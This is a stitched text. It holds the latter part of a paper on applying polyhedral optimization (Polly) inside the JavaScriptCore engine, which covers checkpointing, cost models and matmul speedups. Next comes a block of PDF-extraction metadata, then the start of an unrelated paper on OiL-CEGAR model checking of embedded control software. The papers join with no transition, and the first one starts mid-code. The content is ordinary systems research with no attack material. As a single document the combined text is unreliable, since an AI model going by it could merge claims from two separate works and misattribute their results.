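  for (let i = 0; i < input.length; i++) out[i] = input[i] * factor;
}

// Non-idempotent region: updates `data` in place, so a partial run
// followed by a full re-execution gives a different result.
function scaleInPlace(data, factor) {
  for (let i = 0; i < data.length; i++) data[i] *= factor;
}
```

Re-running `scaleInto` after a simulated interruption leaves `out` identical to a single clean run, whereas re-running `scaleInPlace` double-scales the prefix that had already been processed.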
In our polyhedral context, the cost of saving the memory state to create the checkpoint could be greatly reduced. Relying on proposals for speculative just-in-time polyhedral optimizers [10], we could exploit the affine memory access functions to save only the part of the memory that is known to be updated by the loop nest. The main difference with existing work is that the speculation does not concern the polyhedral nature of the loop, but the removal of JavaScript dynamism. Nevertheless, the solution of only saving what would be modified is the same. For both solutions, when a speculation failure is triggered in one of the parallel threads, our engine must jump to a custom handler. This handler stops all threads and re-executes the loop from the beginning using the non-speculative sequential layer. For the rollback-based solution, the custom handler must also restore the memory state.

### 4.3 Solution To Issue 3: Gain Versus Overhead

Our proposal first relies on the layered architecture of the JavaScript engine to ensure that spending time in polyhedral optimization is acceptable. JavaScriptCore already has a configurable cost model, based on the number of bytecode instructions executed by a function and on its number of invocations. This model ensures that the functions optimized by the FTL JIT layer are those where the program spends most of its execution time. Secondly, relying on Polly, our proposal also leverages another cost model. Polyhedral optimization, even in a static context, must not be applied blindly, because in some cases it may hurt performance instead of improving it. As a consequence, Polly includes its own cost model, which checks some conditions on the loop nest before optimizing it. Thus, Polly will not even try to optimize the LLVM-IR code generated by our JavaScript engine if it believes the code will not benefit from polyhedral optimization. 
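As a hedged sketch of such invocation-count based tiering (the tier names follow JavaScriptCore's layers, but the counter logic and thresholds here are ours and purely illustrative; the engine's actual model also weighs bytecode size):

```javascript
// Toy tiering decision: promote a function to the next optimization layer
// once it has been invoked "enough". Thresholds are illustrative only.
const TIER_THRESHOLDS = { baseline: 10, dfg: 100, ftl: 1000 };

function nextTier(currentTier, invocationCount) {
  if (currentTier === "llint" && invocationCount >= TIER_THRESHOLDS.baseline) return "baseline";
  if (currentTier === "baseline" && invocationCount >= TIER_THRESHOLDS.dfg) return "dfg";
  if (currentTier === "dfg" && invocationCount >= TIER_THRESHOLDS.ftl) return "ftl";
  return currentTier; // not hot enough yet: stay in the current layer
}
```

Only functions that reach the "ftl" tier would ever pay the polyhedral optimization cost, which is how the layered design keeps the overhead confined to hot code.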
Last, extending a state-of-the-art JavaScript engine such as JavaScriptCore allows us to benefit from the parallel compilation mechanisms that are already at work. In JavaScriptCore, the generation of the LLVM-IR and the compilation of this representation to native code are already performed by a parallel thread. As a consequence, the additional time spent by Polly performing polyhedral optimization only delays the moment when the optimized native code is ready for execution.

### 5 Prototype Implementation

Our implementation is a modified version of JavaScriptCore including the solutions proposed in Section 4 and running the Polly passes in the FTL JIT layer. The implementation regarding non-SESE regions and parallel speculation failures, as described in Sections 4.1.1 and 4.2, is not yet complete. Nevertheless, as described in the next section, this baseline prototype allows us to assess the validity of our approach, at least on carefully chosen examples. We also modified Polly for different purposes. First, we added support for the inttoptr instruction, which caused our matmul function to be rejected by Polly's SCoP detection pass. This instruction is widely used by the engine to create LLVM-IR pointers from constant locations known by the FTL JIT compiler. We also added support for the sext and trunc instructions in Polly's array delinearization algorithm. These instructions, previously not handled by the algorithm, are widely used by JavaScriptCore. This is related to the NaN boxing trick used by the runtime to internally store JavaScript objects and primitive types: both are represented by a 64-bit value where the first bits indicate the type. For 32-bit integers, a trunc instruction is required to remove these first bits and obtain the effective 32-bit value.

### 6 Experimental Results

To assess the validity of the proposed solutions, we now review preliminary results obtained with the matrix multiplication function shown in Figure 7. 
This function satisfies the requirement of our implementation, which handles only single dimension arrays of primitive types, as stated in Section 4.1.3. The matrices provided as parameters are single dimension arrays whose size is the number of elements in the matrix. We ran the following experiments on a desktop machine with an Intel Xeon W3520 processor with four physical cores and hyperthreading disabled. The machine runs Linux 4.4.0, and we used LLVM and Polly version 4.0.0. Thanks to the modifications both to the LLVM-IR generated by JavaScriptCore and to Polly, Polly is able to handle the loop of the matrix multiplication function. We ran Polly with only the --parallel option. Figure 10 shows that after optimization, as reported in a pseudo-code fashion by Polly, the matrix multiplication loop has been made parallel and tiled. Regarding aliasing issues, Figure 10 shows that JavaScript type-based alias analysis has not been effective, because Polly generates a runtime test guarding the execution of the parallel version of the code. Because the three matrices provided as parameters to matmul have the same type, i.e., arrays, it is impossible, looking at their type only, to ensure that they will not alias. The content of the alias checks also reveals that Polly was able to recover the two dimensional nature of the memory accesses in the three matrices, internally called Mem5, Mem6 and Mem7 by Polly. Because our prototype implementation is not yet complete regarding the handling of speculation failures, as stated in Section 5, we must ensure that no such failure can happen in our evaluation. To that end, we use input matrices guaranteeing that the matmul function always writes inside the bounds of the result matrix, that the result matrix does not contain any hole, and that integer operations never overflow. 
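A hedged sketch of how such benign inputs can be constructed (our own code, not the paper's harness): fill the flat operand arrays with small non-negative integers so that every dot product of length m stays well below 2^31, and allocate the result array at full size up front so it is dense and hole-free.

```javascript
// Build overflow-safe inputs for a flat n x m by m x p matrix multiply.
// With entries in [0, maxVal], each result entry is at most m * maxVal^2,
// so we require that bound to stay below 2^31 (32-bit signed integers).
function makeBenignInputs(n, m, p, maxVal) {
  if (m * maxVal * maxVal >= 2 ** 31) throw new Error("entries too large: 32-bit overflow possible");
  const fill = (len) => Array.from({ length: len }, (_, i) => (i * 7 + 3) % (maxVal + 1));
  return {
    a: fill(n * m),
    b: fill(m * p),
    c: new Array(n * p).fill(0), // dense, hole-free result array
  };
}
```

Pre-filling `c` at its full final size means the benchmark never appends past the end of the array, so the in-bounds and no-hole conditions above hold by construction.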
To fairly evaluate our version of JavaScriptCore including polyhedral optimization, where the blocks handling speculation failure have been removed but not re-introduced, we created a modified version of the classic JavaScriptCore where these blocks are also removed. Figure 10. Optimized code generated by Polly for the matrix multiply function in Figure 7. Tiling and parallelization have been performed, and a runtime check is required for aliasing issues. <table> <thead> <tr> <th>Size of left matrix</th> <th>Execution time without Polly (s)</th> <th>Execution time with Polly (s)</th> <th>Speedup</th> </tr> </thead> <tbody> <tr> <td>50x3000</td> <td>0.08</td> <td>0.06</td> <td>1.33</td> </tr> <tr> <td>500x3000</td> <td>0.85</td> <td>0.22</td> <td>3.86</td> </tr> <tr> <td>2000x3000</td> <td>3.3</td> <td>0.87</td> <td>3.79</td> </tr> </tbody> </table> Figure 11. Speedups resulting from polyhedral optimization for the matmul function with different matrix sizes. From these results, it is clear that the benefit of performing polyhedral optimization depends on the amount of computation performed by the code. Nevertheless, as soon as the matrices are large enough, the polyhedral optimization leads to a speedup which is almost the number of threads. In this benchmark, because our engine performs polyhedral optimization in parallel with the first executions of the function, the additional compile time required by Polly is hidden. Said differently, it takes far longer to execute the function in the LLINT, Baseline JIT and DFG JIT layers than to compile it with the FTL JIT.

### 7 Related Work

We now review existing research works that recently addressed the parallel execution of JavaScript programs. River Trail [9] is an extension of the language allowing the programmer to indicate to the JavaScript engine where parallelism can be exploited. It mainly provides an application programming interface for expressing data parallelism. 
This is done through the addition of a new special JavaScript type called parallel array, on which the programmer can apply parallel operations. River Trail can be seen as a kind of map-reduce framework for JavaScript. Compared to the goal pursued by the ongoing work presented in this paper, program source code must be changed to use River Trail, and parallelization is not automatic. More recently, additions towards concurrency in JavaScript have been introduced in the language specification [4]. The main novelty is the capability to perform concurrent accesses to the new SharedArrayBuffer type. The role of threads is played by Web Workers in the browser environment. This feature is already supported by JavaScript engines, and the authors of JavaScriptCore recently started to investigate how the thread concept could be added to JavaScript [18]. Like River Trail, and in contrast to our proposal, these extensions propose new constructs in the language and do not address automatic parallelization. Recently, Thread Level Speculation (TLS) systems have been proposed in the context of JavaScript implementations. Martinsen et al. [13] proposed to parallelize the execution of different JavaScript functions by integrating standard TLS mechanisms within the just-in-time compilation layer of Google's V8. Compared to our proposal, they cannot exploit loop level parallelism, because they only execute different functions in parallel. TLS at loop level has also been proposed [14]. Compared to us, this work adds a non-negligible speculation overhead: in addition to the JavaScript speculation that must be handled by any JavaScript engine, such systems must also dynamically check that the memory accesses performed in parallel by the different threads do not break the sequential semantics of the program. Finally, the closest work to our proposal is also an extension of a JavaScript engine for automatic loop parallelization [17]. 
Our proposal is an extension of this work, which only focused on so-called DOALL loops. A DOALL loop does not exhibit any dependence between its iterations. Using the polyhedral model, thanks to its precise representation of loop dependences, our goal is to parallelize more loops and to perform complex optimizing loop transformations.

### 8 Conclusion

We have presented challenges and solutions for making polyhedral optimization work on JavaScript programs. We integrated our proposal in the last layer of the JavaScriptCore engine, which uses LLVM to generate efficient native code. We modified the JavaScript engine to expose more information about loop nests, and we integrated Polly to produce optimized parallel code. Our preliminary results demonstrate that polyhedral optimization can be beneficial in the context of JavaScript programs. We now need to complete the implementation of the mechanism handling parallel speculation failures. This development is a large amount of work in the context of a production engine such as JavaScriptCore, whose performance comes at the price of a very large code base containing a lot of corner cases. We also need to perform solid benchmarking experiments to confirm with numbers, at least on some standard benchmarks and applications, that polyhedral transformations are effective in a JavaScript engine. Looking at the benchmarks and applications from previous studies [14, 17], we are confident that polyhedral optimization will be beneficial. The techniques presented in this paper are specific to the JavaScript language; other dynamic languages like Python or Ruby are not direct targets of this work. Nevertheless, we believe that it could be very interesting to study polyhedral opportunities for these languages as well. Regarding the perspectives opened by this work, we believe that it could be very interesting and challenging to merge polyhedral speculation as proposed for static languages [11] with JavaScript speculation. 
This polyhedral speculation concerns the memory accesses performed by loop nests that cannot be statically identified as SCoPs. At runtime, thanks to memory profiling, the loop nests that conform to SCoPs can be optimized by polyhedral tools. In the context of JavaScript, we want to study how to merge memory access profiling in the first layer of the engine with the JavaScript profiling mechanisms already at work. From this memory profiling information, the JavaScript engine would construct memory access models. Finally, these models would be used in the last layers to perform polyhedral optimization on code that cannot be identified as a SCoP by tools like Polly, or to perform other parallelization transformations. References
{"Source-Url": "https://manuelselva.github.io/docs/papers/2018-01-impact/Manuel-Selva-jspoly-Paper-impact-2018.pdf", "len_cl100k_base": 9069, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 35798, "total-output-tokens": 11400, "length": "2e13", "weborganizer": {"__label__adult": 0.00036072731018066406, "__label__art_design": 0.00027060508728027344, "__label__crime_law": 0.0002386569976806641, "__label__education_jobs": 0.0003066062927246094, "__label__entertainment": 6.109476089477539e-05, "__label__fashion_beauty": 0.00014531612396240234, "__label__finance_business": 0.00017917156219482422, "__label__food_dining": 0.0003445148468017578, "__label__games": 0.0005369186401367188, "__label__hardware": 0.0010585784912109375, "__label__health": 0.00037026405334472656, "__label__history": 0.00023281574249267575, "__label__home_hobbies": 6.306171417236328e-05, "__label__industrial": 0.0003333091735839844, "__label__literature": 0.0001863241195678711, "__label__politics": 0.00021946430206298828, "__label__religion": 0.00044798851013183594, "__label__science_tech": 0.01129913330078125, "__label__social_life": 5.161762237548828e-05, "__label__software": 0.004528045654296875, "__label__software_dev": 0.97802734375, "__label__sports_fitness": 0.0002944469451904297, "__label__transportation": 0.0004305839538574219, "__label__travel": 0.0001995563507080078}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 50452, 0.03408]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 50452, 0.4918]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 50452, 0.90181]], "google_gemma-3-12b-it_contains_pii": [[0, 4477, false], [4477, 9485, null], [9485, 12087, null], [12087, 16963, null], [16963, 20814, null], [20814, 25921, null], [25921, 30135, null], [30135, 35970, null], [35970, 39716, null], [39716, 45358, null], 
[45358, 50452, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4477, true], [4477, 9485, null], [9485, 12087, null], [12087, 16963, null], [16963, 20814, null], [20814, 25921, null], [25921, 30135, null], [30135, 35970, null], [35970, 39716, null], [39716, 45358, null], [45358, 50452, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 50452, null]], "pdf_page_numbers": [[0, 4477, 1], [4477, 9485, 2], [9485, 12087, 3], [12087, 16963, 4], [16963, 20814, 5], [20814, 25921, 6], [25921, 30135, 7], [30135, 35970, 8], [35970, 39716, 9], [39716, 45358, 10], [45358, 50452, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 50452, 0.02294]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
ab7a3f35963ece11bb5ec1b621d05dd76a752f35
Model checking embedded control software using OS-in-the-loop CEGAR

Dongwoo Kim, School of Computer Science and Engineering, Kyungpook National University, Daegu, South Korea, dkw9242@gmail.com
Yunja Choi, School of Computer Science and Engineering, Kyungpook National University, Daegu, South Korea, yuchoi76@knu.ac.kr

Abstract—Verification of multitasking embedded software requires taking into account its underlying operating system w.r.t. its scheduling policy and handling of task priorities in order to achieve a higher degree of accuracy. However, such comprehensive verification of multitasking embedded software together with its underlying operating system is very costly and impractical. To reduce the verification cost while achieving the desired accuracy, we propose a variant of CEGAR, named OiL-CEGAR (OS-in-the-Loop Counterexample-Guided Abstraction Refinement), where a composition of a formal OS model and an abstracted application program is used for comprehensive verification and is successively refined using the counterexamples generated from the composition model. The refinement process utilizes the scheduling information in the counterexample, which acts as a mini-OS to check the executability of the counterexample trace on the concrete program. Our experiments using a prototype implementation of OiL-CEGAR show that OiL-CEGAR greatly improves the accuracy and efficiency of property checking in this domain. It automatically removed all false alarms and accomplished property checking within an average of 476 seconds over a set of multitasking programs, whereas model checking using existing approaches over the same set of programs either showed an accuracy of under 11.1% or was unable to finish the verification due to timeout.

Index Terms—CEGAR, embedded OS, multitasking

I. INTRODUCTION

An embedded system consists of a number of devices controlled by software programs. 
Such control software is typically multitasking and runs on top of an operating system designed for controlling small-scale embedded devices, such as sensors, actuators, brake pedals, engines, etc., which are mostly used in safety-critical domains. The control program, in particular, is tightly coupled with its underlying operating system as they are compiled together to generate a piece of embedded control software, and the behavior of the control program can therefore not be analyzed accurately without taking into account the behavior of the operating system. However, research and practice in this domain have focused either on the verification of the control program or on the verification of the operating system, independent of each other [1]–[8], due to the huge verification cost when trying to comprehensively verify application software together with the implementation of the operating system. Verifying embedded control software without considering the underlying OS often results in a high rate of false alarms, as such verification is highly likely to refute a given verification property based on incorrect execution sequences among tasks. For example, a low-priority task may be preempted by higher-priority tasks in a control program. Such behavior is determined by the system configuration and the scheduling policy of the OS used. Most existing approaches that do not consider the underlying OS use sound abstraction of the scheduling behavior such as non-deterministic scheduling of tasks [1], [4]. Our experiments showed that these approaches had an accuracy of only 11.1%, verifying only two of the 18 applications within the time bound. This work sets out to find an efficient verification method for multitasking embedded control software that reduces false alarm rates as well as verification cost. 
To this end, we adapted the CEGAR approach [9], [10], where abstraction-verification-refinement iterations are successively performed until a real problem is identified or the given property is verified, to the domain of embedded software by taking the operating system into the loop. Our approach, named OiL-CEGAR (OS-in-the-Loop CEGAR), is unique in that (1) it utilizes models of the operating system, which are assumed to be correct w.r.t. the requirements specifications, and (2) we take advantage of two different types of model checkers: a symbolic model checker, NuSMV [11], for property checking, and the C code model checker CBMC [1] for code-based false alarm identification. For a given property, OiL-CEGAR first tries to verify the property on the composition of the operating system model and the application model abstracted from the program source code. If the property is refuted, the model checker NuSMV generates a counterexample trace including task scheduling information and the control flow of the application program. This task scheduling information is used to construct a mini-OS for the application source code so that CBMC can be used to check the executability of the given trace in the concrete application program. If the trace is executable, then the counterexample is a real alarm. Otherwise, the composition of the OS model and the application model is refined using the trace so that the next iteration of OiL-CEGAR can be performed. OiL-CEGAR is efficient in identifying real property violations with moderate verification cost, even though more complexity is introduced by taking the OS model into account.

II. BACKGROUND

A multitasking application program consists of a set of tasks. Each task has its own priority, so that a task with higher priority is scheduled earlier than tasks with lower priority. It is also possible for a task with lower priority to run prior to a task with higher priority if it accesses a critical section by occupying resources. A running task may enter a waiting state by voluntarily waiting for an event. An application program interacts with its underlying operating system through API functions provided by the OS. Figure 1 shows an example of the embedded application program that will be used throughout this paper. Given the system configuration, the two tasks are expected to be executed as shown in the lower part of the figure: the autostart task t1 runs first and activates task t2, which has higher priority. Task t2 preempts t1, runs to set wait_sw to ON, and goes to the waiting state by calling WaitEvent(e1), giving another execution round to task t1. t1 calls SetEvent for task t2, as the branch condition in line 04 evaluates to true, which preempts t1 again and wakes t2. 
After t2 terminates, t1 activates t2 again, but t2 terminates immediately, as wait_sw evaluates to ON.

A. Verification of embedded control software

The behavior of an embedded application program is determined by its system configuration, task logic, and OS behavior, which typically produce a unique deterministic trace unless an interrupt occurs. If we abstract the operating system, e.g., by using non-deterministic scheduling, we need to consider multiple execution traces for the same program, as context switching may occur at any instruction of each task. For example, there can be up to \(\binom{15}{5} = 3{,}003\) interleaved execution sequences to check for the program in Figure 1 if we assume that a context switch may occur at every line of the program. It is extremely expensive to perform comprehensive verification in this case, both in terms of performing model checking for property checking and in terms of identifying false alarms produced by incorrect task execution sequences. We note that even software-level dynamic testing of an embedded control program is difficult, because embedded software requires a specific hardware platform, platform-specific library functions, and other peripherals such as sensors and event generators. Software-level testing often requires specific simulation environments [12], which are not always available in the development process.

B. Counterexample-guided abstraction refinement

CEGAR [9], [10] is an effective verification method for alleviating verification complexity through successive abstraction-verification-refinement iterations. Figure 2 shows the overall process of CEGAR. It starts with an initial abstraction \(\mathcal{M}\) of a given application. If the abstract model is verified for a given property \(\varphi\), then we can safely conclude that the concrete application is verified, as the model is a sound abstraction of the application. 
Otherwise, the counterexample \(\tau\) generated from checking \(\varphi\) is tested on the concrete application to determine whether it is an actual execution trace, as it may be the case that the trace is possible only on the abstract model (a false alarm). If it is executable on the concrete application, it shows a property violation of the system (a true alarm). Otherwise, \(\tau\) is used to refine \(\mathcal{M}\), which is verified w.r.t. \(\varphi\) in the next iteration. This process is repeated until a real alarm is identified or until the property is verified. CEGAR has been successfully applied in various application domains [4], [13]–[18]. However, it has not been clear whether it can be effectively applied to multitasking embedded software, taking into account the OS behavior.

C. Formal models of embedded operating systems

A number of approaches for formally modeling and verifying embedded operating systems have been proposed. Most notably, the construction of seL4 [19] is based on successive refinements of a formal OS model written in Haskell [20], which is thoroughly verified for correctness w.r.t. the functional requirements of a real-time embedded operating system. The other notable example is the formal modeling of embedded operating systems that are compliant with the OSEK/VDX international standard [21]. Approaches include, for example, modeling in Promela [22], CSP [8], NuSMV [23], UPPAAL [24] and the K-framework [25]. OiL-CEGAR is independent of formal models and modeling approaches, but this work adopts the pattern-based automatic model construction approach suggested in [23] to facilitate automation of the OiL-CEGAR process. Figure 3 shows the internal structure of the embedded operating system used in [23], modeled by referring to the OSEK/VDX international standard. An OS kernel consists of a set of kernel objects, which can be Tasks, Events, Resources, or Alarms. A task (or thread) is the basic building block of embedded software. 
An embedded OS maintains the internal state of each task, which is typically one of {running, ready, waiting, suspended}, as in the OSEK/VDX OS, Zephyr [26], FreeRTOS [27], etc., with minor variations. The internal state of each task changes according to the task management and scheduling mechanism in the OS kernel, which is triggered by requests from the application program through API function calls. A task may set a periodic alarm to activate another task or to set an event. An external event triggers a corresponding ISR (Interrupt Service Routine), which may call API functions. The OSEK OS adopts priority-based FIFO scheduling with dynamically changing ceiling priorities for resource allocation in order to avoid the priority-inversion problem. Reference [23] formally modeled the behavior of each kernel object as a parameterized state machine (called a pattern) and defined an OS model as a synchronized parallel composition of multiple kernel objects whose types and numbers are determined by the system configuration. In addition, an OS generator was defined as a function from configuration vectors to formal OS models. This approach is implemented as a prototype tool for automated model construction by composing the formal patterns specified in the input language of NuSMV [11] or Spin [28]. The generated OS models are validated through property verification using a set of functional requirements identified from the OSEK/VDX international standard. For more details on the OSEK OS and pattern-based OS model construction, please refer to [23]. Our work utilized the prototype tool with a minor extension to the OS model. To enable a focused discussion of OiL-CEGAR, however, throughout this paper an OS model is assumed to be a black-box component where transitions among internal states of tasks are the only externally visible behaviors. III. BASIC DEFINITIONS This section defines the terminologies required to explain OiL-CEGAR. Definition 1.
A control flow graph (CFG) for a task \( T_{CFG} = (N, E, n_0, n_t) \) is a directed graph where \( N \) is a set of statement blocks, \( n_0 \in N \) is a unique entry block, \( n_t \in N \) is a unique exit block, and \( E \subseteq N \times N \) is a set of directed control flow edges. A statement block is a sequence of statements and a unit of atomic execution: each statement block consists of a maximal sequence of statements in which no statement other than the first defines or uses visible variables or calls an API function. Definition 2. Visible variables and visible statements - A visible variable is a variable that is globally accessible or that uses other visible variables. Visible variables include global variables, pointer variables, and variables in shared memory. - A visible statement is a simple statement that either defines/uses a visible variable or calls an API function. Definition 3. A statement block is the maximal sequence of statements \( a_1, \ldots, a_n \) in a task where only the first statement in the block may be visible and no statement uses any variable defined by a previous statement in the block, i.e., \( \text{def}(a_i) \cap \text{use}(a_j) = \emptyset \) for all \( i < j \leq n \). Each statement block contains at most one visible statement and is a unit of context switching, i.e., the control flow may be switched to other tasks after the statement block has been executed. Definition 4. \( M = (S, S_0, R) \) is a statemachine, where \( S \) is a set of states, \( S_0 \) is a set of initial states, and \( R \subseteq S \times \Gamma \times G \times S \) is a transition relation triggered by a set of events \( \Gamma \), including a null event, and guarded by a set of guarding conditions \( G \). A transition $r \in R$ is represented as $s_i \xrightarrow{e[g]} s_j$, where $s_i$ and $s_j$ are the source and target states, respectively.
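The statement-block partition of Definitions 2 and 3 can be sketched as a greedy pass over a statement list. The triple encoding of a statement as (visible flag, def set, use set) is an assumption made here for illustration.

```python
def partition_blocks(stmts):
    """Greedy maximal statement blocks (Definition 3): a visible statement
    may only appear first in its block, and no statement may use a variable
    defined earlier in the same block. Each stmt is (visible, defs, uses)."""
    blocks, cur, defined = [], [], set()
    for visible, defs, uses in stmts:
        # start a new block if the statement is visible (and not block-
        # initial) or if it uses a variable defined earlier in the block
        if cur and (visible or (uses & defined)):
            blocks.append(cur)
            cur, defined = [], set()
        cur.append((visible, defs, uses))
        defined |= defs
    if cur:
        blocks.append(cur)
    return blocks

# wait_sw is visible and starts a block; the def-use pair on x is split:
prog = [(True, {"wait_sw"}, set()),   # visible: starts a block
        (False, {"x"}, set()),        # invisible, no conflict: joins it
        (False, set(), {"x"})]        # uses x defined above: new block
blocks = partition_blocks(prog)
print([len(b) for b in blocks])  # [2, 1]
```

The def-use split in the example mirrors the refinement described in Section V-B, where NuSMV's block-at-once execution semantics forces dependent statements into separate blocks.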
We sometimes abbreviate a sequence of transitions $s_0 \xrightarrow{e_1[g_1]} s_1 \xrightarrow{e_2[g_2]} s_2 \xrightarrow{e_3[g_3]} \ldots \xrightarrow{e_n[g_n]} s_n$ as $s_0s_1s_2\ldots s_n$ to save space. We use two composition operators on statemachines, $||$ and $\odot$, which are defined as follows: **Definition 5.** $M_1||M_2 = (S, S_0, R)$ is a synchronous parallel composition of two statemachines $M_1 = (S^1, S^1_0, R^1)$ and $M_2 = (S^2, S^2_0, R^2)$ synchronized over the set of events $\Gamma$, where - $S = S^1 \times S^2$, - $S_0 = S^1_0 \times S^2_0$, and - $R$ is such that $s^1_i \xrightarrow{e[g]} s^1_j \in R^1$ and $s^2_p \xrightarrow{e'[g']} s^2_q \in R^2$ implies (1) $(s^1_i, s^2_p) \xrightarrow{e[g \land g']} (s^1_j, s^2_q) \in R$ if $e = e'$, (2) $(s^1_i, s^2_p) \xrightarrow{e[g]} (s^1_j, s^2_p) \in R$, and (3) $(s^1_i, s^2_p) \xrightarrow{e'[g']} (s^1_i, s^2_q) \in R$. A synchronous parallel composition [29] of two statemachines allows each statemachine to perform its own transition while the other stays in the same state. **Definition 6.** $M_1 \odot M_2 = (S, S_0, R)$ is a trace composition of two statemachines $M_1 = (S^1, S^1_0, R^1)$ and $M_2 = (S^2, S^2_0, R^2)$ w.r.t. the set of error states $S^2_E$ in $M_2$ and a labeling function $L$ over $S^1 \cup S^2$, where - $S \subseteq S^1$, - $S_0 \subseteq S^1_0$, and - $R \subseteq R^1$, where $r : s^1_i \xrightarrow{e[g]} s^1_j \in R$ iff $r \in R^1$ and there exists $r' : s^2_p \xrightarrow{e'[g']} s^2_q \in R^2$ such that $e = e'$, $L(s^1_i) = L(s^2_p)$, $L(s^1_j) = L(s^2_q)$, $g \implies g'$, and $s^2_q \notin S^2_E$. A trace composition only allows a transition of a statemachine when the other statemachine has an equivalent transition w.r.t. the state labels and transition conditions that does not lead to an error state. **IV.
OiL-CEGAR** OiL-CEGAR takes advantage of both CEGAR and the use of the OS in the model checking process with a two-way reciprocal abstraction scheme. It is a variation of CEGAR in that (1) a verified OS model is used to enhance the accuracy of the property checking and (2) the scheduling information in the counterexample generated from the property checking is used to construct a mini-OS, instead of the full-scale OS implementation, for checking the executability of the counterexample on the program source code. This section provides an intuitive introduction to OiL-CEGAR. Technical details will be provided in later sections. **A. Overview of OiL-CEGAR** Figure 4 illustrates the OiL-CEGAR process. It starts with the composition of a verified OS model $M_{os}$ and an initial sound abstraction $\overline{M_{app}}$ of a given application program $M_{app}$. For a given property $\varphi$, if the composition model $M = M_{os} || \overline{M_{app}}$ respects the property, i.e., $M \models \varphi$, then we conclude that the concrete embedded software $M_{os} || M_{app}$ also respects the property. Otherwise, a counterexample $\tau$ showing a property violation in the form of a sequence of states in $M$ is generated. As $\tau$ can be a false alarm due to the use of the abstract model $\overline{M_{app}}$ in the verification, we need to check its executability on the concrete system $M_{os} || M_{app}$. However, as it is difficult to construct an execution environment for the actual implementation of the OS and the application program, we instead check the reachability of the composition $M_{os}(\tau) || M_{app}$, where $M_{os}(\tau)$ is a mini-OS constructed from $\tau$, so that if it terminates in a final state, we can conclude that $\tau$ is an executable execution sequence in the concrete program, i.e., a true alarm.
Otherwise, a trace $\tau'$, the subsequence of $\tau$ from the initial state to the first unreachable state of $\tau$, is generated and is used to refine $M$, which is used in the next iteration of OiL-CEGAR. This process is repeated until either an actual property violation is found or the property is proved. Two well-known model checkers are used in OiL-CEGAR: the symbolic model checker NuSMV [11] for LTL property checking of $M_{os} || \overline{M_{app}} \models \varphi$ and the SAT-based C code model checker CBMC [1] for checking the reachability of $M_{os}(\tau) || M_{app}$. **B. Construction of $\overline{M_{app}}$** An application program is a parallel composition of multiple tasks, i.e., $M_{app} = P_1 || P_2 || \ldots || P_n$. We construct an abstraction $\overline{M_{app}}$ of $M_{app}$ by abstracting each task, i.e., $\overline{M_{app}} = M_{P_1} || M_{P_2} || \ldots || M_{P_n}$, where each $M_{P_i}$ is a statemachine representation of task $P_i$. Figure 5 illustrates how each task $P_i$ is modeled as a statemachine using the example code shown in Figure 1. We first construct a control flow graph (CFG) of each task, abstract the CFG by eliminating statements involving visible variables, and then transform the abstract CFG into a statemachine model by adding a transition from the exit node to the entry node (as a task can be reactivated after its termination) and guarding conditions to each transition to check the internal state of the task. Details of the conversion process will be explained in Section VI. Fig. 5. Construction of the task model. $\overline{M_{app}}$ is then composed with the OS model. Figure 6 illustrates a simplified $M_{os} || \overline{M_{app}}$ for the example in Figure 1, where each state consists of the internal state of task t1, the internal state of task t2, the block number of task t1, and the block number of task t2, respectively.
Every transition sequence finishes either at s13, indicating that task t2 is in the waiting state, or at s26, indicating that all the tasks have terminated. Let us assume that we are checking the following property: P1. A call to \( \text{WaitEvent} \) shall be followed by a matching call to \( \text{SetEvent} \). Model checking this property would generate a counterexample, say \( \tau_1 = s_0s_1s_2s_4s_5s_6s_7s_{11}\ldots \), in which t2 would go to the waiting state and stay there forever. \( \tau \) is a finite maximal subsequence of a counterexample trace that does not end with a cycle. C. Executability checking using \( \tau \) Whether the counterexample \( \tau \) is a realistic execution trace or not is tested on the concrete application program \( M_{app} \). As the counterexample trace contains information on task execution sequences, we use this information to guide the execution sequence of the tasks in the actual program code. The task execution sequence is the sequence of states in \( \tau \) projected to the states of the OS. For example, \( \tau_{1|os} \), the OS projection of \( \tau_1 \), determines the actual sequence of blocks to be executed according to this counterexample trace. However, it is impossible to execute \( B_1^1 \) after \( B_3^1 \); i.e., \( s_7 \rightarrow s_{11} \) is a non-executable transition in \( \tau_1 \) because if \( wait\_sw == ON \), it must execute \( B_1^1 \). We use the C code model checker CBMC to identify the first non-executable transition in the counterexample trace using the information on the task execution sequence extracted from the trace, called a mini-OS, which acts like a test driver.
